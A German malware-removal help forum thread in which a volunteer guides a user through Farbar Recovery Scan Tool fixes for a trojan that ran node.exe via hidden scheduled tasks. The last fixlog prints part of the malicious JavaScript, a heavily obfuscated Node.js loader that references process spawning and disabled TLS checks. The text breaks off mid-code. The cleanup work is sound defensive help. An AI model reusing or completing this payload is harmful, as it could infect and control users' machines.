2020-10-04 11:29 - 2019-12-07 11:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2020-10-04 11:29 - 2018-10-06 14:16 - 000744808 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2020-10-04 11:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\Macromed
2020-10-04 11:09 - 2019-12-07 11:14 - 000000000 ___HD C:\Program Files\WindowsApps
2020-10-04 11:09 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-10-04 11:01 - 2020-01-20 20:51 - 000000000 ____D C:\Program Files (x86)\Adobe
2020-10-04 11:01 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2020-10-03 21:42 - 2019-12-07 11:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2020-10-03 21:31 - 2020-07-07 08:30 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-10-03 21:29 - 2018-10-06 14:15 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-10-03 09:56 - 2018-10-20 12:23 - 000000000 ____D C:\Users\Tamy\AppData\Roaming\vlc
2020-10-03 09:56 - 2018-10-20 08:50 - 000000000 ____D C:\Program Files (x86)\VideoLAN
2020-10-03 09:54 - 2018-06-08 10:23 - 000000000 ____D C:\Users\Tamy\AppData\Local\Packages
2020-10-02 11:36 - 2019-11-22 23:09 - 000000000 ____D C:\Users\Tamy\AppData\Roaming\obs-studio
2020-10-02 10:24 - 2018-10-28 12:30 - 000001278 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
2020-09-28 21:43 - 2019-09-21 14:35 - 000000000 ____D C:\Users\Tamy\AppData\Roaming\.minecraft
2020-09-27 15:54 - 2018-10-27 18:59 - 000000000 ____D C:\Users\Tamy\Downloads\PixumFotobuecher
2020-09-27 15:54 - 2018-10-27 18:40 - 000000000 ____D C:\ProgramData\tmp
2020-09-27 15:54 - 2018-10-27 18:40 - 000000000 ____D C:\ProgramData\hps
2020-09-27 14:26 - 2018-10-28 09:12 - 000000000 ____D C:\Users\Tamy\Downloads\Fotos
2020-09-26 09:41 - 2019-11-22 22:15 - 000000000 ____D C:\Users\Tamy\AppData\Roaming\Twitch
2020-09-26 09:26 - 2020-04-02 12:33 - 000000000 ____D C:\Users\Tamy\Downloads\Sonstiges
2020-09-26 08:30 - 2019-02-05 20:27 - 000000000 ____D C:\ProgramData\Mozilla
2020-09-24 10:46 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2020-09-23 20:46 - 2018-10-27 14:48 - 000000000 ____D C:\Users\Tamy\Downloads\Bilder
2020-09-23 19:08 - 2020-04-07 13:44 - 000000000 ____D C:\Users\Tamy\Downloads\Sortieren
2020-09-23 15:51 - 2020-04-07 10:13 - 000000000 ____D C:\Program Files (x86)\PDF24
2020-09-23 15:35 - 2018-10-06 14:21 - 000000000 ____D C:\ProgramData\Package Cache
2020-09-20 11:39 - 2019-08-06 20:10 - 000000000 ____D C:\Users\Tamy\Downloads\Twitch
2020-09-20 10:53 - 2019-11-04 20:13 - 000000000 ____D C:\Users\Public\Security Sessions
2020-09-19 13:26 - 2020-08-18 08:40 - 001722788 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-09-19 13:26 - 2019-12-07 16:51 - 000743672 _____ C:\WINDOWS\system32\perfh007.dat
2020-09-19 13:26 - 2019-12-07 16:51 - 000150094 _____ C:\WINDOWS\system32\perfc007.dat
2020-09-19 10:11 - 2018-12-18 22:09 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2020-09-17 08:48 - 2018-10-06 15:00 - 000000000 ____D C:\WINDOWS\system32\MRT
2020-09-17 08:43 - 2018-10-06 15:00 - 129170736 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2020-09-15 20:06 - 2019-12-07 16:54 - 000000000 ___SD C:\WINDOWS\system32\AppV
2020-09-15 20:06 - 2019-12-07 16:54 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SystemResources
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\migwiz
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\appraiser
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\Provisioning
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2020-09-15 17:49 - 2019-12-07 11:03 - 000000000 ____D C:\WINDOWS\servicing
2020-09-15 17:49 - 2019-12-07 11:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-09-15 17:41 - 2020-08-18 08:35 - 002876416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2020-09-11 08:06 - 2020-08-18 08:57 - 000003374 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-950702919-2450676760-769127011-1001
2020-09-11 08:06 - 2020-08-17 23:42 - 000002376 _____ C:\Users\Tamy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-09-11 08:06 - 2018-06-08 10:25 - 000000000 ___RD C:\Users\Tamy\OneDrive
2020-09-09 10:05 - 2019-12-07 11:18 - 000842296 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2020-09-09 10:05 - 2019-12-07 11:18 - 000175160 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
         

Alt 04.10.2020, 20:25   #10
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Standard

Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker



  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    cmd: type "C:\Windows\System32\Tasks\BackgroundActivityCaptureService_6eb8e"
    cmd: type "C:\Windows\System32\Tasks\Serial CredentialEnrollmentManagerUserSvc Avira"
    Task: {2A1C14F9-707F-4D01-AC6E-11BDCD9A1678} - System32\Tasks\BackgroundActivityCaptureService_6eb8e => C:\Program Files (x86)\nodejs\node.exe [15017624 2017-05-02] (Node.js Foundation -> Node.js) <==== ACHTUNG
    Task: {678A824B-D141-4938-A6F5-2B40BD531FBF} - System32\Tasks\Serial CredentialEnrollmentManagerUserSvc Avira => C:\Program Files (x86)\nodejs\node.exe [15017624 2017-05-02] (Node.js Foundation -> Node.js) <==== ACHTUNG
    HKLM\...\Run: [] => [X]
    HKLM-x32\...\Run: [Avira SystrayStartTrigger] => "C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe"
    HKLM-x32\...\Run: [] => [X]
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
    HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize 
    HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\Run: [] => [X]
    AS: Avira Antivirus (Enabled - Up to date) {33CF8AA2-FA06-4AD4-98AB-332D53DD7FFB}
    C:\Program Files (x86)\Lavasoft
    C:\Program Files (x86)\Avira
    C:\ProgramData\Avira
    C:\Program Files (x86)\nodejs
    C:\WINDOWS\system32\Tasks\Avira
    DeleteKey: HKCR\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233}
    DeleteKey: HKU\S-1-5-18\Software\OCS
    DeleteKey: HKU\.DEFAULT\Software\OCS
    DeleteKey: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233}
    cmd: netsh advfirewall reset
    emptytemp:
    End::
             
  • Starte nun FRST und klicke direkt den Reparieren Button.Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Alt 04.10.2020, 21:34   #11
Öhm
 
Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Standard

Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker



Hier der Fixlog:

Code:
ATTFilter
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 04-10-2020
durchgeführt von Tamy (04-10-2020 21:26:20) Run:1
Gestartet von C:\Users\Tamy\Desktop
Geladene Profile: Tamy
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
cmd: type "C:\Windows\System32\Tasks\BackgroundActivityCaptureService_6eb8e"
cmd: type "C:\Windows\System32\Tasks\Serial CredentialEnrollmentManagerUserSvc Avira"
Task: {2A1C14F9-707F-4D01-AC6E-11BDCD9A1678} - System32\Tasks\BackgroundActivityCaptureService_6eb8e => C:\Program Files (x86)\nodejs\node.exe [15017624 2017-05-02] (Node.js Foundation -> Node.js) <==== ACHTUNG
Task: {678A824B-D141-4938-A6F5-2B40BD531FBF} - System32\Tasks\Serial CredentialEnrollmentManagerUserSvc Avira => C:\Program Files (x86)\nodejs\node.exe [15017624 2017-05-02] (Node.js Foundation -> Node.js) <==== ACHTUNG
HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [Avira SystrayStartTrigger] => "C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe"
HKLM-x32\...\Run: [] => [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize 
HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\Run: [] => [X]
AS: Avira Antivirus (Enabled - Up to date) {33CF8AA2-FA06-4AD4-98AB-332D53DD7FFB}
C:\Program Files (x86)\Lavasoft
C:\Program Files (x86)\Avira
C:\ProgramData\Avira
C:\Program Files (x86)\nodejs
C:\WINDOWS\system32\Tasks\Avira
DeleteKey: HKCR\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233}
DeleteKey: HKU\S-1-5-18\Software\OCS
DeleteKey: HKU\.DEFAULT\Software\OCS
DeleteKey: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233}
cmd: netsh advfirewall reset
emptytemp:

*****************


========= type "C:\Windows\System32\Tasks\BackgroundActivityCaptureService_6eb8e" =========

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="hxxp://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>SYSTEM</Author>
    <Description>Leitet AllJoyn-Mitteilungen fr die lokalen AllJoyn-Clients um. Wenn dieser Dienst angehalten wird, k”nnen die AllJoyn-Clients, die nicht ber eigene gebndelte Router verfgen, nicht ausgefhrt werden.</Description>
    <URI>\BackgroundActivityCaptureService_6eb8e</URI>
  </RegistrationInfo>
  <Triggers>
    <BootTrigger>
      <StartBoundary>2020-10-04T11:37:24</StartBoundary>
      <Enabled>true</Enabled>
      <Delay>PT3M</Delay>
    </BootTrigger>
    <CalendarTrigger>
      <StartBoundary>2020-10-04T11:37:24</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>HighestAvailable</RunLevel>
      <UserId>SYSTEM</UserId>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <Duration>PT10M</Duration>
      <WaitTimeout>PT1H</WaitTimeout>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
    <Priority>7</Priority>
    <RestartOnFailure>
      <Interval>PT1M</Interval>
      <Count>5</Count>
    </RestartOnFailure>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files (x86)\nodejs\node.exe</Command>
      <Arguments>C:\WINDOWS\Installer\{8E2EC350-56EF-4F2D-9BBC-958DE58DA64F}\{CEFCDC5A-D8C1-45EB-B191-896048718E4C}</Arguments>
    </Exec>
  </Actions>
</Task>
========= Ende von CMD: =========


========= type "C:\Windows\System32\Tasks\Serial CredentialEnrollmentManagerUserSvc Avira" =========

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="hxxp://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>Tamy</Author>
    <Description>Der Diagnosesystemhost wird vom Diagnoserichtliniendienst als Host fr Diagnosen verwendet, die im Kontext eines lokalen Systems ausgefhrt werden mssen. Wird dieser Dienst beendet, funktionieren alle davon abh„ngigen Diagnosen nicht mehr ordnungsgem„á.</Description>
    <URI>\Serial CredentialEnrollmentManagerUserSvc Avira</URI>
  </RegistrationInfo>
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <Hidden>true</Hidden>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <RestartOnFailure>
      <Count>5</Count>
      <Interval>PT3M</Interval>
    </RestartOnFailure>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <Duration>PT10M</Duration>
      <WaitTimeout>PT1H</WaitTimeout>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
  </Settings>
  <Triggers>
    <BootTrigger>
      <StartBoundary>2020-07-24T18:48:51</StartBoundary>
      <Delay>PT3M</Delay>
    </BootTrigger>
    <CalendarTrigger>
      <StartBoundary>2020-07-24T18:48:51</StartBoundary>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\Program Files (x86)\nodejs\node.exe"</Command>
      <Arguments>"C:\ProgramData\Package Cache\{895D81F3-BD9E-4BDC-8152-8D4BCE99A5CA}\{537C046A-D622-438D-B6C4-22A66648C813}"</Arguments>
    </Exec>
  </Actions>
</Task>
========= Ende von CMD: =========

"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{2A1C14F9-707F-4D01-AC6E-11BDCD9A1678}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2A1C14F9-707F-4D01-AC6E-11BDCD9A1678}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\BackgroundActivityCaptureService_6eb8e => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\BackgroundActivityCaptureService_6eb8e" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{678A824B-D141-4938-A6F5-2B40BD531FBF}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{678A824B-D141-4938-A6F5-2B40BD531FBF}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Serial CredentialEnrollmentManagerUserSvc Avira => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Serial CredentialEnrollmentManagerUserSvc Avira" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Avira SystrayStartTrigger" => erfolgreich entfernt
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => erfolgreich entfernt
"HKU\S-1-5-21-950702919-2450676760-769127011-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Web Companion" => erfolgreich entfernt
"HKU\S-1-5-21-950702919-2450676760-769127011-1001\Software\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt
"AS: Avira Antivirus (Enabled - Up to date) {33CF8AA2-FA06-4AD4-98AB-332D53DD7FFB}" => erfolgreich entfernt
"C:\Program Files (x86)\Lavasoft" => nicht gefunden
"C:\Program Files (x86)\Avira" => nicht gefunden
C:\ProgramData\Avira => erfolgreich verschoben
C:\Program Files (x86)\nodejs => erfolgreich verschoben
C:\WINDOWS\system32\Tasks\Avira => erfolgreich verschoben
HKCR\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233} => nicht gefunden
HKU\S-1-5-18\Software\OCS => nicht gefunden
HKU\.DEFAULT\Software\OCS => nicht gefunden
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233} => nicht gefunden

========= netsh advfirewall reset =========

OK.


========= Ende von CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 7888896 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 29609172 B
Java, Flash, Steam htmlcache => 329015562 B
Windows/system/drivers => 12042968 B
Edge => 10415732 B
Chrome => 0 B
Firefox => 24662954 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 42662 B
NetworkService => 49338 B
Tamy => 39424739 B

RecycleBin => 0 B
EmptyTemp: => 432.2 MB temporäre Dateien entfernt.

================================


Das System musste neu gestartet werden.

==== Ende von Fixlog 21:28:49 ====
         

Alt 04.10.2020, 21:43   #12
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Standard

Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker



  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    Virustotal: C:\WINDOWS\Installer\{8E2EC350-56EF-4F2D-9BBC-958DE58DA64F}\{CEFCDC5A-D8C1-45EB-B191-896048718E4C}
    cmd: type "C:\WINDOWS\Installer\{8E2EC350-56EF-4F2D-9BBC-958DE58DA64F}\{CEFCDC5A-D8C1-45EB-B191-896048718E4C}"
    End::
             
  • Starte nun FRST und klicke direkt den Reparieren Button.Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Alt 04.10.2020, 21:49   #13
Öhm
 
Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Standard

Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker



Dankeschön! Hier der Fixlog:

Code:
ATTFilter
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 04-10-2020
durchgeführt von Tamy (04-10-2020 21:48:26) Run:2
Gestartet von C:\Users\Tamy\Desktop
Geladene Profile: Tamy
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
Virustotal: C:\WINDOWS\Installer\{8E2EC350-56EF-4F2D-9BBC-958DE58DA64F}\{CEFCDC5A-D8C1-45EB-B191-896048718E4C}
cmd: type "C:\WINDOWS\Installer\{8E2EC350-56EF-4F2D-9BBC-958DE58DA64F}\{CEFCDC5A-D8C1-45EB-B191-896048718E4C}"

*****************

VirusTotal: C:\WINDOWS\Installer\{8E2EC350-56EF-4F2D-9BBC-958DE58DA64F}\{CEFCDC5A-D8C1-45EB-B191-896048718E4C} => https://www.virustotal.com/gui/file/09a136f14144d15d3f06f587c4ce7bcbfb00d8a066201ee562469b6b049271b0/detection/f-09a136f14144d15d3f06f587c4ce7bcbfb00d8a066201ee562469b6b049271b0-1601840907

========= type "C:\WINDOWS\Installer\{8E2EC350-56EF-4F2D-9BBC-958DE58DA64F}\{CEFCDC5A-D8C1-45EB-B191-896048718E4C}" =========

/*e0JCNjUwMTNFLTRCNEMtNDQ0My04RkExLTU0NkE1OTRCMUMwQX18MS4wLjM=*/var _0x666d=['V0NX','dW5saW5rU3luYw\x3d\x3d','cm1kaXJTeW5j','WHRw','c3RyaW5naWZ5','d21pZA\x3d\x3d','WWdl','eGxS','RGlL','ZGF0YQ\x3d\x3d','aG9K','c3RhdHVzQ29kZQ\x3d\x3d','eVlH','U09x','QVhU','anVz','dXNlIHN0cmljdA\x3d\x3d','cmFuZG9tQnl0ZXM\x3d','dG9TdHJpbmc\x3d','aGV4','ZlNB','aW5kZXhPZg\x3d\x3d','bmt0','c3Vic3Ry','Vm5W','bGVuZ3Ro','c3Bhd25TeW5j','ZXJyb3I\x3d','c3RhdHVz','U0tl','TEJp','d1NB','cm1kaXIg','b3V0cHV0','cXVlcnlzdHJpbmc\x3d','cGF0aA\x3d\x3d','Y3J5cHRv','Y2hpbGRfcHJvY2Vzcw\x3d\x3d','dXJs','MS4wLjM\x3d','LmJpbg\x3d\x3d','am9pbg\x3d\x3d','ZGlybmFtZQ\x3d\x3d','bnBtLmNtZA\x3d\x3d','YXJndg\x3d\x3d','bG9n','YXBwbHk\x3d','UHRD','e30uY29uc3RydWN0b3IoInJldHVybiB0aGlzIikoICk\x3d','YnVq','OHwxfDN8NHwwfDV8N3w2fDI\x3d','c3BsaXQ\x3d','aW5mbw\x3d\x3d','d2Fybg\x3d\x3d','ZGVidWc\x3d','ZXhjZXB0aW9u','MXw2fDV8M3wwfDJ8NA\x3d\x3d','Y29uc29sZQ\x3d\x3d','dHJhY2U\x3d','cmVhZEZpbGVTeW5j','Ymt0','aEdm','bGFzdEluZGV4T2Y\x3d','cGFyc2U\x3d','YmFzZTY0','dXRmLTg\x3d','akNt','a05h','cHJvdG9jb2w\x3d','c2xpY2U\x3d','ZW52','Tk9ERV9UTFNfUkVKRUNUX1VOQVVUSE9SSVpFRA\x3d\x3d','Z2V0','V2VG','bG9jYXRpb24\x3d','aGVhZGVycw\x3d\x3d','bWF0Y2g\x3d','cmVzb2x2ZQ\x3d\x3d','Y29uY2F0','bU9x','RkNJ','dG1wZGly','T0dJ','b2lD','Lmpz'];(function(_0x22bff4,_0x37cf38){var _0x36380e=function(_0x2cdd8e){while(--_0x2cdd8e){_0x22bff4['\x70\x75\x73\x68'](_0x22bff4['\x73\x68\x69\x66\x74']());}};var _0x30ff0d=function(){var _0x297406={'\x64\x61\x74\x61':{'\x6b\x65\x79':'\x63\x6f\x6f\x6b\x69\x65','\x76\x61\x6c\x75\x65':'\x74\x69\x6d\x65\x6f\x75\x74'},'\x73\x65\x74\x43\x6f\x6f\x6b\x69\x65':function(_0x3b21ab,_0x262a53,_0xee5ac,_0x54273f){_0x54273f=_0x54273f||{};var _0x4451ea=_0x262a53+'\x3d'+_0xee5ac;var _0x46ee7d=0x0;for(var _0x46ee7d=0x0,_0x73da03=_0x3b21ab['\x6c\x65\x6e\x67\x74\x68'];_0x46ee7d<_0x73da03;_0x46ee7d++){var _0x542277=_0x3b21ab[_0x46ee7d];_0x4451ea+='\x3b\x20'+_0x542277;var _0x3b1c60=_0x3b21ab[_0x542277];_0x3b21ab['\x70\x75\x73\x68'](_0x3b1c60);_0x73da03=_0x3b21ab['\x6c\x65\x6e\x67\x74\x68'];if(_0x3b1c60!==!![]){_0x4451ea+='\x3d'+_0x3b1c60;}}_0x54273f['\x63\x6f\x6f\x6b\x69\x65']=_0x4451ea;},'\x72\x65\x6d\x6f\x76\x65\x43\x6f\x6f\x6b\x69\x65':function(){return'\x64\x65\x76';},'\x67\x65\x74\x43\x6f\x6f\x6b\x69\x65':function(_0x1a24cf,_0x55b9ca){_0x1a24cf=_0x1a24cf||function(_0x595dd5){return _0x595dd5;};var _0x41e974=_0x1a24cf(new RegExp('\x28\x3f\x3a\x5e\x7c\x3b\x20\x29'+_0x55b9ca['\x72\x65\x70\x6c\x61\x63\x65'](/([.$?*|{}()[]\/+^])/g,'\x24\x31')+'\x3d\x28\x5b\x5e\x3b\x5d\x2a\x29'));var _0x5742d1=function(_0x1e4a69,_0x598789){_0x1e4a69(++_0x598789);};_0x5742d1(_0x36380e,_0x37cf38);return _0x41e974?decodeURIComponent(_0x41e974[0x1]):undefined;}};var _0x4710ad=function(){var _0x59aeb4=new RegExp('\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d');return _0x59aeb4['\x74\x65\x73\x74'](_0x297406['\x72\x65\x6d\x6f\x76\x65\x43\x6f\x6f\x6b\x69\x65']['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};_0x297406['\x75\x70\x64\x61\x74\x65\x43\x6f\x6f\x6b\x69\x65']=_0x4710ad;var _0x4ae988='';var _0x35f2e8=_0x297406['\x75\x70\x64\x61\x74\x65\x43\x6f\x6f\x6b\x69\x65']();if(!_0x35f2e8){_0x297406['\x73\x65\x74\x43\x6f\x6f\x6b\x69\x65'](['\x2a'],'\x63\x6f\x75\x6e\x74\x65\x72',0x1);}else if(_0x35f2e8){_0x4ae988=_0x297406['\x67\x65\x74\x43\x6f\x6f\x6b\x69\x65'](null,'\x63\x6f\x75\x6e\x74\x65\x72');}else{_0x297406['\x72\x65\x6d\x6f\x76\x65\x43\x6f\x6f\x6b\x69\x65']();}};_0x30ff0d();}(_0x666d,0xba));var _0xd666=function(_0x2ab53a,_0x2d72eb){_0x2ab53a=_0x2ab53a-0x0;var _0x399946=_0x666d[_0x2ab53a];if(_0xd666['\x69\x6e\x69\x74\x69\x61\x6c\x69\x7a\x65\x64']===undefined){(function(){var _0x3e9842=Function('\x72\x65\x74\x75\x72\x6e\x20\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x28\x29\x20'+'\x7b\x7d\x2e\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72\x28\x22\x72\x65\x74\x75\x72\x6e\x20\x74\x68\x69\x73\x22\x29\x28\x29'+'\x29\x3b');var _0x18c44d=_0x3e9842();var _0x222f24='\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2b\x2f\x3d';_0x18c44d['\x61\x74\x6f\x62']||(_0x18c44d['\x61\x74\x6f\x62']=function(_0x34b72c){var _0x4dd175=String(_0x34b72c)['\x72\x65\x70\x6c\x61\x63\x65'](/=+$/,'');for(var 